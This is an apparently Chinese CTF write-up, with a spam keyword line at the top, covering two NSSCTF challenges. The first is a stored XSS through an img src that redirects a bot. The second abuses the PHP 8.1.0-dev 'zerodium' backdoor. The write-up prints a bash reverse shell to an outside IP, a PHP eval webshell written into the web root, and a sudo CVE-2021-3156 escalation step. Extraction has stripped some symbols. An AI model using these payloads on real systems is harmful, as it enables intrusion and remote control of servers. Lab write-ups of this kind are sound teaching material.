蒙文网站开发,佛山高端网站开发公司,企业所得税怎么做账,尤溪住房和城乡建设局网站目录
①门酱想玩什么呢#xff1f;
②Becomeroot ①门酱想玩什么呢#xff1f;
先试一下随便给个链接 不能访问远程链接#xff0c;结合评论区功能#xff0c;不难联想到xss#xff0c;只要给个评论区链接让门酱访问就可
我们研究下评论区 从评论区知道#xff0c;要…目录
①门酱想玩什么呢
②Becomeroot ①门酱想玩什么呢
先试一下随便给个链接 不能访问远程链接结合评论区功能不难联想到xss只要给个评论区链接让门酱访问就可
我们研究下评论区 从评论区知道要让门酱玩元梦之星考虑直接
scriptdocument.locationhttps://ymzx.qq.com/;/script
尝试传了发现不能起作用跳转估计是这些被html实体化了 那咋整呢题目里还提供了评论插入图片功能
我们就按示例传一下(必须以http://开头否则不能解析为图片) 链接是插入到了src中我们可以直接用闭合img标签
评论传
http://scriptdocument.locationhttps://ymzx.qq.com/;/script.png 123 /png 成功重定向到元梦之星官网 bp抓包 获得该条恶意评论链接
http://node1.anna.nssctf.cn:28834/words/?titleMQ%3D%3DcontentaHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D
把这个链接给门酱即可获得flag ②Becomeroot
进来直接告诉我们php版本是8.1.0-dev PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客
User-Agentt: zerodiumsystem(bash -c exec bash -i /dev/tcp/124.222.136.33/1337 01);
直接反弹shell发现要提权 GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令
脚本不太好整到靶机上还是写马连webshell方便点
User-Agentt: zerodiumsystem(echo ?php eval(\$_POST[1])?/var/www/html/1.php); 尝试用suid提权插件来整失败 GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器
提权执行命令(环境没了借了别的师傅的图)